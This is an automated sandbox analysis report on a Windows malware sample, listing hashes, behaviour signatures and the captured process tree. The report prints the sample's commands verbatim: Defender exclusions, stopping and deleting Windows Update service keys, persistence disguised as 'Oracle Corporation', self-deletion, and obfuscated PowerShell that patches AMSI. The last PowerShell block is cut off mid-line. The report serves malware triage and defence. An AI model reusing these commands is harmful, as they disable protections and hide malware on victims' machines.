176dc08f41e7dc298687c9054a60cd0516a9d97818c909032adb81f8cba6b1d1

Analysis

max time kernel
50s
max time network
40s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
02/11/2023, 15:51

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
Size

7.5MB
MD5

8e2cf089a59489292fd09692752b0830
SHA1

9fab309e8cfcb9aede2ec22ea87f669bafdcd5e3
SHA256

176dc08f41e7dc298687c9054a60cd0516a9d97818c909032adb81f8cba6b1d1
SHA512

77e6c93d805ea5f82f8f93fd5bf75e02c30c33472875ef8edd0fedbe562dc5042e0f09d38dc51c3045949705d2ff28c0c954f5bc1b78e22bde8091397f5999ed
SSDEEP

196608:+Ld/SEWAgmXlq4lT3WTjMvKil/1vFtf7sAjjNBj2HxHsO8x:w/pWAgq84lqHMBLF1gA/NBj2HBspx

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

description	pid	Process	procid_target
PID 2708 created 3228	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	29
PID 2708 created 3228	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	29
PID 2708 created 3228	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	29
PID 2708 created 3228	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	29
PID 2708 created 3228	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	29
PID 2708 created 3228	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	29
PID 2708 created 3228	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	29

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2708 set thread context of 1748	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	122

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3224	sc.exe
4756	sc.exe
1276	sc.exe
464	sc.exe
3464	sc.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2524	powershell.exe
2524	powershell.exe
2524	powershell.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2488	powershell.exe
2488	powershell.exe
2488	powershell.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
2224	powershell.exe
2224	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeShutdownPrivilege	5032	powercfg.exe
Token: SeCreatePagefilePrivilege	5032	powercfg.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeShutdownPrivilege	4428	powercfg.exe
Token: SeCreatePagefilePrivilege	4428	powercfg.exe
Token: SeShutdownPrivilege	1284	powercfg.exe
Token: SeCreatePagefilePrivilege	1284	powercfg.exe
Token: SeShutdownPrivilege	3136	powercfg.exe
Token: SeCreatePagefilePrivilege	3136	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2488	powershell.exe
Token: SeSecurityPrivilege	2488	powershell.exe
Token: SeTakeOwnershipPrivilege	2488	powershell.exe
Token: SeLoadDriverPrivilege	2488	powershell.exe
Token: SeSystemProfilePrivilege	2488	powershell.exe
Token: SeSystemtimePrivilege	2488	powershell.exe
Token: SeProfSingleProcessPrivilege	2488	powershell.exe
Token: SeIncBasePriorityPrivilege	2488	powershell.exe
Token: SeCreatePagefilePrivilege	2488	powershell.exe
Token: SeBackupPrivilege	2488	powershell.exe
Token: SeRestorePrivilege	2488	powershell.exe
Token: SeShutdownPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeSystemEnvironmentPrivilege	2488	powershell.exe
Token: SeRemoteShutdownPrivilege	2488	powershell.exe
Token: SeUndockPrivilege	2488	powershell.exe
Token: SeManageVolumePrivilege	2488	powershell.exe
Token: 33	2488	powershell.exe
Token: 34	2488	powershell.exe
Token: 35	2488	powershell.exe
Token: 36	2488	powershell.exe
Token: SeIncreaseQuotaPrivilege	2488	powershell.exe
Token: SeSecurityPrivilege	2488	powershell.exe
Token: SeTakeOwnershipPrivilege	2488	powershell.exe
Token: SeLoadDriverPrivilege	2488	powershell.exe
Token: SeSystemProfilePrivilege	2488	powershell.exe
Token: SeSystemtimePrivilege	2488	powershell.exe
Token: SeProfSingleProcessPrivilege	2488	powershell.exe
Token: SeIncBasePriorityPrivilege	2488	powershell.exe
Token: SeCreatePagefilePrivilege	2488	powershell.exe
Token: SeBackupPrivilege	2488	powershell.exe
Token: SeRestorePrivilege	2488	powershell.exe
Token: SeShutdownPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeSystemEnvironmentPrivilege	2488	powershell.exe
Token: SeRemoteShutdownPrivilege	2488	powershell.exe
Token: SeUndockPrivilege	2488	powershell.exe
Token: SeManageVolumePrivilege	2488	powershell.exe
Token: 33	2488	powershell.exe
Token: 34	2488	powershell.exe
Token: 35	2488	powershell.exe
Token: 36	2488	powershell.exe
Token: SeIncreaseQuotaPrivilege	2488	powershell.exe
Token: SeSecurityPrivilege	2488	powershell.exe
Token: SeTakeOwnershipPrivilege	2488	powershell.exe
Token: SeLoadDriverPrivilege	2488	powershell.exe
Token: SeSystemProfilePrivilege	2488	powershell.exe
Token: SeSystemtimePrivilege	2488	powershell.exe
Token: SeProfSingleProcessPrivilege	2488	powershell.exe
Token: SeIncBasePriorityPrivilege	2488	powershell.exe
Token: SeCreatePagefilePrivilege	2488	powershell.exe
Token: SeBackupPrivilege	2488	powershell.exe
Token: SeRestorePrivilege	2488	powershell.exe
Token: SeShutdownPrivilege	2488	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 3464	1840	cmd.exe	108
PID 1840 wrote to memory of 3464	1840	cmd.exe	108
PID 2228 wrote to memory of 5032	2228	cmd.exe	109
PID 2228 wrote to memory of 5032	2228	cmd.exe	109
PID 1840 wrote to memory of 3224	1840	cmd.exe	110
PID 1840 wrote to memory of 3224	1840	cmd.exe	110
PID 2228 wrote to memory of 4428	2228	cmd.exe	111
PID 2228 wrote to memory of 4428	2228	cmd.exe	111
PID 1840 wrote to memory of 4756	1840	cmd.exe	113
PID 1840 wrote to memory of 4756	1840	cmd.exe	113
PID 2228 wrote to memory of 1284	2228	cmd.exe	112
PID 2228 wrote to memory of 1284	2228	cmd.exe	112
PID 2228 wrote to memory of 3136	2228	cmd.exe	114
PID 2228 wrote to memory of 3136	2228	cmd.exe	114
PID 1840 wrote to memory of 1276	1840	cmd.exe	115
PID 1840 wrote to memory of 1276	1840	cmd.exe	115
PID 1840 wrote to memory of 464	1840	cmd.exe	116
PID 1840 wrote to memory of 464	1840	cmd.exe	116
PID 1840 wrote to memory of 4232	1840	cmd.exe	117
PID 1840 wrote to memory of 4232	1840	cmd.exe	117
PID 1840 wrote to memory of 2688	1840	cmd.exe	118
PID 1840 wrote to memory of 2688	1840	cmd.exe	118
PID 1840 wrote to memory of 5048	1840	cmd.exe	119
PID 1840 wrote to memory of 5048	1840	cmd.exe	119
PID 1840 wrote to memory of 3988	1840	cmd.exe	120
PID 1840 wrote to memory of 3988	1840	cmd.exe	120
PID 1840 wrote to memory of 5024	1840	cmd.exe	121
PID 1840 wrote to memory of 5024	1840	cmd.exe	121
PID 2708 wrote to memory of 1748	2708	NEAS.8e2cf089a59489292fd09692752b0830_JC.exe	122
PID 1280 wrote to memory of 1672	1280	cmd.exe	127
PID 1280 wrote to memory of 1672	1280	cmd.exe	127
PID 2224 wrote to memory of 2552	2224	powershell.exe	128
PID 2224 wrote to memory of 2552	2224	powershell.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3228
- C:\Users\Admin\AppData\Local\Temp\NEAS.8e2cf089a59489292fd09692752b0830_JC.exe
  "C:\Users\Admin\AppData\Local\Temp\NEAS.8e2cf089a59489292fd09692752b0830_JC.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2228
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5032
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1284
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1840
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3464
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3224
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4756
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1276
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:464
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4232
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2688
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:5048
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:3988
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:5024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uquccxa#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Oracle Corporation' /tr '''C:\Users\Admin\AppData\Roaming\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Oracle Corporation' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Oracle Corporation" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2488
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rquxxx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Oracle Corporation" } Else { "C:\Users\Admin\AppData\Roaming\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn Oracle Corporation
    3⤵
    PID:2552
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\NEAS.8e2cf089a59489292fd09692752b0830_JC.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1280
- - C:\Windows\System32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:ihJCforYBMmI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CosjlSYhedBbrx,[Parameter(Position=1)][Type]$qKpscWguci)$QrTmTXTJbLo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+'e'+'m'+'oryM'+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+'e'+'Ty'+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'as'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$QrTmTXTJbLo.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+'e'+''+'c'+'i'+'a'+'lN'+'a'+'m'+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig,'+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CosjlSYhedBbrx).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+'e,'+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$QrTmTXTJbLo.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+'ke',''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+'c'+','+'H'+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+'N'+'ew'+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+'l',$qKpscWguci,$CosjlSYhedBbrx).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $QrTmTXTJbLo.CreateType();}$puQTZSlWlbRok=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'yst'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+'.Un'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+'p'+''+[Char](117)+''+[Char](81)+''+[Char](84)+''+[Char](90)+'S'+[Char](108)+'W'+[Char](108)+''+[Char](98)+''+[Char](82)+'o'+[Char](107)+'');$KqlHKmIXSHPsdq=$puQTZSlWlbRok.GetMethod(''+'K'+'ql'+[Char](72)+''+[Char](75)+''+'m'+''+[Char](73)+'X'+[Char](83)+'HP'+[Char](115)+'d'+'q'+'',[Reflection.BindingFlags]'P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+'t'+''+'a'+'t'+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CDxNFNlGtuEJfHMdHhd=ihJCforYBMmI @([String])([IntPtr]);$hbzdYIKCtsaIcGKCDegKif=ihJCforYBMmI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TygcVJyCqIT=$puQTZSlWlbRok.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$ZtrmGzpXNGUEcV=$KqlHKmIXSHPsdq.Invoke($Null,@([Object]$TygcVJyCqIT,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$EzdXikVqCXtKPcuZa=$KqlHKmIXSHPsdq.Invoke($Null,@([Object]$TygcVJyCqIT,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$SUXdwEH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZtrmGzpXNGUEcV,$CDxNFNlGtuEJfHMdHhd).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$QGXBjrEHlpiCWJJaA=$KqlHKmIXSHPsdq.Invoke($Null,@([Object]$SUXdwEH,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+'S'+''+'c'+'a'+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$jtAkwfKDLm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EzdXikVqCXtKPcuZa,$hbzdYIKCtsaIcGKCDegKif).Invoke($QGXBjrEHlpiCWJJaA,[uint32]8,4,[ref]$jtAkwfKDLm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$QGXBjrEHlpiCWJJaA,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EzdXikVqCXtKPcuZa,$hbzdYIKCtsaIcGKCDegKif).Invoke($QGXBjrEHlpiCWJJaA,[uint32]8,0x20,[ref]$jtAkwfKDLm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+'r'+''+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dccRBcVrdkAZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sObvrwKDCvJMWW,[Parameter(Position=1)][Type]$jJANmnAjEC)$JPcwdzFGdts=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+'l'+'e'+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+'g'+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+','+''+'A'+'ns'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'u'+[Char](116)+'oC'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$JPcwdzFGdts.DefineConstructor(''+'R'+''+'T'+''+'S'+''+[Char](112)+'ec'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$sObvrwKDCvJMWW).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');$JPcwdzFGdts.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'oke',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'ig,'+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'ua'+'l'+'',$jJANmnAjEC,$sObvrwKDCvJMWW).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $JPcwdzFGdts.CreateType();}$IhtBmEztiIEOX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+'sa'+'f'+''+'e'+'I'+'h'+'t'+[Char](66)+'m'+[Char](69)+''+[Char](122)+''+'t'+''+[Char](105)+''+[Char](73)+'EOX');$bPkHZqLMTUTuSo=$IhtBmEztiIEOX.GetMethod('bPk'+[Char](72)+''+[Char](90)+''+[Char](113)+''+[Char](76)+''+'M'+'T'+'U'+''+[Char](84)+''+[Char](117)+''+[Char](83)+'o',[Reflection.BindingFlags]''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+'i'+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jEcSWCELEBTBHjWAhvD=dccRBcVrdkAZ @([String])([IntPtr]);$qYIRodchQXoKJZsRRYDRlQ=dccRBcVrdkAZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VNtxdMNaPjY=$IhtBmEztiIEOX.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+[Char](108)+'')));$vQXesIoREyHrrl=$bPkHZqLMTUTuSo.Invoke($Null,@([Object]$VNtxdMNaPjY,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+'i'+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$rSZfrEUlGfVZKdvgP=$bPkHZqLMTUTuSo.Invoke($Null,@([Object]$VNtxdMNaPjY,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+'te'+[Char](99)+''+[Char](116)+'')));$lghGHER=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vQXesIoREyHrrl,$jEcSWCELEBTBHjWAhvD).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$dHgbGMOnksJAOHjBN=$bPkHZqLMTUTuSo.